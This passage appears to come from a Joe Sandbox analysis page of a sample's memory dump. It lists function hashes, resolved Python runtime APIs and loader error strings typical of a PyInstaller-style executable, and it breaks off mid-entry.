Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
Instruction ID: bbe23cf9f2fff0c27b78f87251cfaf6f64152812c848dfe3c4823333ffec3d8f
Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
Instruction Fuzzy Hash: BC515D76A18652C2EB358B29D04422827A0FF56F78F245139CE8D97BA5CF3AEC42C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C1880 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
Instruction ID: 8b264fb79c1732f4bc19553bc703ac1da2c9cb6944bc134f7f16c0fc764b2fb1
Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
Instruction Fuzzy Hash: E2516036A18651C6E7248B29C04423C27A1FF46FA9F255139CE4D9B7A4CF3AED53C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C20A0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
Instruction ID: 75acd5ab67316f23abfc993e0a8575542657ee8b51bd2261b46df12ea3cf5b25
Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
Instruction Fuzzy Hash: 80515376A18652C6EB248B29C04463C27A1FF56F68F284139CF8D97B95CF3AEC52C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C1C90 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
Instruction ID: 1790b29ab691b2c919572bb9d89637d55934336273e1b833c1f7c09237e663bc
Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
Instruction Fuzzy Hash: 19515036A18A52C6E7248B29D04063837A1FF4AFA9F244139DE4D97794CF3AEC53C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C5F30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 8666fe4a6cb9b18a70f1a08ee593c8eead01b24bc0d61cbb9e21c22becfd0844
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 64417C56C0974AC4E9B9891C05016B92680BF73FB1DA853BCDDDAA73D7CE1E2D87C221

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CA430 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
Instruction ID: 8ffb7ceae307263a77ebe0d4ac84bafbeb1cc83af67e65231a3d9c04f0378529
Opcode Fuzzy Hash: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
Instruction Fuzzy Hash: 6B41E462B18A5982FF14CF6AD91416963A1BB48FE0B19903ADE0DC7B58DF3CD982C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C7C98 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
Instruction ID: 6097e5d5ee961430658156aed56c588e9aa1626127fcf4674ec1a8551331a312
Opcode Fuzzy Hash: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
Instruction Fuzzy Hash: 37318072B09B4282E7649B25A84017966A5BF85FA0F14423CEE9D93BD6DF3CDC02C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D9E40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
Instruction ID: 05349727f06832de4c7f3ff4793eb53e7e3242437f97a90bf04d6ff94c97a7a0
Opcode Fuzzy Hash: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
Instruction Fuzzy Hash: 4BF04F71A182958ADBA48F29A80262977D0FB487D5B80847DE689C3E54DA7C9460CF08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850BC760 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
Instruction ID: 930d4a0d658e5e5d5019c4190b39b1c1aa50950324f7b6e9950336a0df4d2bde
Opcode Fuzzy Hash: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
Instruction Fuzzy Hash: 76A0022594CC07D0E6449B10E9900702730FF51B20B94053AE41DC10A0DF3CED41C702

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B51E0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF6850B346E), ref: 00007FF6850B51F0
GetProcAddress.KERNEL32(?,?,00000000,00007FF6850B346E), ref: 00007FF6850B522A
GetProcAddress.KERNEL32(?,?,00000000,00007FF6850B346E), ref: 00007FF6850B524F
GetProcAddress.KERNEL32(?,?,00000000,00007FF6850B346E), ref: 00007FF6850B5274
GetProcAddress.KERNEL32(?,?,00000000,00007FF6850B346E), ref: 00007FF6850B529C
GetProcAddress.KERNEL32(?,?,00000000,00007FF6850B346E), ref: 00007FF6850B52C4
GetProcAddress.KERNEL32(?,?,00000000,00007FF6850B346E), ref: 00007FF6850B52EC
GetProcAddress.KERNEL32(?,?,00000000,00007FF6850B346E), ref: 00007FF6850B5314
GetProcAddress.KERNEL32(?,?,00000000,00007FF6850B346E), ref: 00007FF6850B533C
GetProcAddress.KERNEL32(?,?,00000000,00007FF6850B346E), ref: 00007FF6850B5364

Strings

Py_InitializeFromConfig, xrefs: 00007FF6850B5292
Failed to get address for PyConfig_InitIsolatedConfig, xrefs: 00007FF6850B534E
PyUnicode_Replace, xrefs: 00007FF6850B58AA
PyUnicode_AsUTF8, xrefs: 00007FF6850B57BA
Failed to get address for PyMem_RawFree, xrefs: 00007FF6850B55F6
PyConfig_SetWideStringList, xrefs: 00007FF6850B53D2
Failed to get address for PyUnicode_Join, xrefs: 00007FF6850B589E
Py_IsInitialized, xrefs: 00007FF6850B52BA
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF6850B5696
PyObject_CallFunctionObjArgs, xrefs: 00007FF6850B5652
PyErr_Fetch, xrefs: 00007FF6850B5422
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF6850B5556
Failed to get address for PyObject_CallFunction, xrefs: 00007FF6850B5646
PyMem_RawFree, xrefs: 00007FF6850B55DA
Failed to get address for PyConfig_Clear, xrefs: 00007FF6850B5326
Failed to get address for PyUnicode_Replace, xrefs: 00007FF6850B58C6
Failed to get address for Py_DecodeLocale, xrefs: 00007FF6850B523C
PyUnicode_FromFormat, xrefs: 00007FF6850B5832
Failed to get address for Py_PreInitialize, xrefs: 00007FF6850B52FE
Failed to get address for Py_IsInitialized, xrefs: 00007FF6850B52D6
PyUnicode_FromString, xrefs: 00007FF6850B585A
PyObject_CallFunction, xrefs: 00007FF6850B562A
PyConfig_SetBytesString, xrefs: 00007FF6850B5382
Failed to get address for PyErr_Occurred, xrefs: 00007FF6850B548E
PyUnicode_Join, xrefs: 00007FF6850B5882
Failed to get address for PyConfig_Read, xrefs: 00007FF6850B5376
Failed to get address for Py_Finalize, xrefs: 00007FF6850B5286
Failed to get address for PyConfig_SetWideStringList, xrefs: 00007FF6850B53EE
Failed to get address for PyErr_Clear, xrefs: 00007FF6850B5416
PyErr_Clear, xrefs: 00007FF6850B53FA
Failed to get address for PyUnicode_Decode, xrefs: 00007FF6850B57FE
Failed to get address for PyImport_ImportModule, xrefs: 00007FF6850B557E
Failed to get address for PyConfig_SetBytesString, xrefs: 00007FF6850B539E
PyModule_GetDict, xrefs: 00007FF6850B5602
PyImport_ImportModule, xrefs: 00007FF6850B5562
PyErr_Restore, xrefs: 00007FF6850B54C2
Failed to get address for PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6850B570E
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF6850B56BE
Failed to get address for PyObject_Str, xrefs: 00007FF6850B56E6
PyConfig_InitIsolatedConfig, xrefs: 00007FF6850B5332
Failed to get address for Py_DecRef, xrefs: 00007FF6850B5202
Failed to get address for PyErr_Print, xrefs: 00007FF6850B54B6
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF6850B5466
PyObject_GetAttrString, xrefs: 00007FF6850B567A
Py_ExitStatusException, xrefs: 00007FF6850B5245
PyErr_Occurred, xrefs: 00007FF6850B5472
Failed to get address for PyErr_Restore, xrefs: 00007FF6850B54DE
Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF6850B55CE
Failed to get address for PyImport_AddModule, xrefs: 00007FF6850B552E
PyUnicode_Decode, xrefs: 00007FF6850B57E2
PyConfig_Read, xrefs: 00007FF6850B535A
Failed to get address for PyEval_EvalCode, xrefs: 00007FF6850B5506
PySys_SetObject, xrefs: 00007FF6850B5792
Failed to get address for PyErr_Fetch, xrefs: 00007FF6850B543E
Py_DecodeLocale, xrefs: 00007FF6850B5220
PyObject_SetAttrString, xrefs: 00007FF6850B56A2
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF6850B5826
PyUnicode_DecodeFSDefault, xrefs: 00007FF6850B580A
PyErr_Print, xrefs: 00007FF6850B549A
Py_PreInitialize, xrefs: 00007FF6850B52E2
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF6850B566E
Failed to get address for PyUnicode_FromString, xrefs: 00007FF6850B5876
PyConfig_SetString, xrefs: 00007FF6850B53AA
PyImport_AddModule, xrefs: 00007FF6850B5512
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF6850B584E
Failed to get address for PySys_SetObject, xrefs: 00007FF6850B57AE
Failed to get address for PyConfig_SetString, xrefs: 00007FF6850B53C6
PyList_Append, xrefs: 00007FF6850B558A
Failed to get address for Py_InitializeFromConfig, xrefs: 00007FF6850B52AE
PySys_GetObject, xrefs: 00007FF6850B576A
Failed to get address for PyStatus_Exception, xrefs: 00007FF6850B575E
Failed to get address for PyModule_GetDict, xrefs: 00007FF6850B561E
PyErr_NormalizeException, xrefs: 00007FF6850B544A
PyMarshal_ReadObjectFromString, xrefs: 00007FF6850B55B2
Failed to get address for PyList_Append, xrefs: 00007FF6850B55A6
GetProcAddress, xrefs: 00007FF6850B5209
Py_Finalize, xrefs: 00007FF6850B526A
Failed to get address for PySys_GetObject, xrefs: 00007FF6850B5786
PyConfig_Clear, xrefs: 00007FF6850B530A
Failed to get address for Py_ExitStatusException, xrefs: 00007FF6850B5261
PyRun_SimpleStringFlags, xrefs: 00007FF6850B571A
PyObject_Str, xrefs: 00007FF6850B56CA
PyEval_EvalCode, xrefs: 00007FF6850B54EA
Py_DecRef, xrefs: 00007FF6850B51E6
Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF6850B5736
PyStatus_Exception, xrefs: 00007FF6850B5742
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6850B56F2
PyImport_ExecCodeModule, xrefs: 00007FF6850B553A
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF6850B57D6

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-4266016200
Opcode ID: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
Instruction ID: d36b6cc0ce40919f48e81a0dc77c3e0879e6adc7fca2e2e0da506ff66c29ca39
Opcode Fuzzy Hash: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
Instruction Fuzzy Hash: BD127264A0EB07D0FA55DB08A8901742BA1BF45FB1B98567DC85EC63A4FF7CAD48C602

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B12B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6850B2B30: MessageBoxW.USER32 ref: 00007FF6850B2C05

_fread_nolock.LIBCMT ref: 00007FF6850B1499

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6850B132B
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6850B12FE
\, xrefs: 00007FF6850B13F5
fseek, xrefs: 00007FF6850B1332
%s%c%s, xrefs: 00007FF6850B13EE
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6850B14BF
fread, xrefs: 00007FF6850B14C6
malloc, xrefs: 00007FF6850B1377
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6850B1370

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Message_fread_nolock
String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
API String ID: 3065259568-2316137593
Opcode ID: 6fc5ac864f703c4be55e556062f1d4a856c1a5df9fca28c7911cf52acfa12488
Instruction ID: 44719b8fc911621c49e3372d17f8fc23521ce0fb4d3dfeaced0b70442a4ec70c
Opcode Fuzzy Hash: 6fc5ac864f703c4be55e556062f1d4a856c1a5df9fca28c7911cf52acfa12488
Instruction Fuzzy Hash: 2451A021A08683C6EA20A711A8916FA6394FF45FE4F904139EE4DC7B86EF7CED45C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B23F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6850B241B
SelectObject.GDI32 ref: 00007FF6850B2462
DrawTextW.USER32 ref: 00007FF6850B2485
SelectObject.GDI32 ref: 00007FF6850B249B
ReleaseDC.USER32 ref: 00007FF6850B24AB
MoveWindow.USER32 ref: 00007FF6850B24FB
MoveWindow.USER32 ref: 00007FF6850B253B
MoveWindow.USER32 ref: 00007FF6850B258E
MoveWindow.USER32 ref: 00007FF6850B25D6

Strings

P%, xrefs: 00007FF6850B246F

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction ID: 3e3b3ce59e3587f0f7fdae895279097488a449c89705b54a7b2d4c62ce838074
Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction Fuzzy Hash: 4A51F426618BA1C7D6349F26A0581BAB7A1FB98B71F004125EFDE83784DF3CD485DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C67A4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C67E7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C6BD4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C6E70

Strings

p, xrefs: 00007FF6850C6911
-, xrefs: 00007FF6850C687D
:, xrefs: 00007FF6850C69A0
f, xrefs: 00007FF6850C6909
p, xrefs: 00007FF6850C6899

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
Instruction ID: 363b0734e3ba09ecd68645fa3872601829425e9d31b0429d68488002a83dbe65
Opcode Fuzzy Hash: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
Instruction Fuzzy Hash: DB127F62E08653C6FB349A58D1546B976A1FF82F64FC44139E68A876C4DF3CEC84CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C1108 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C1148
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C1510
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C17AF

Strings

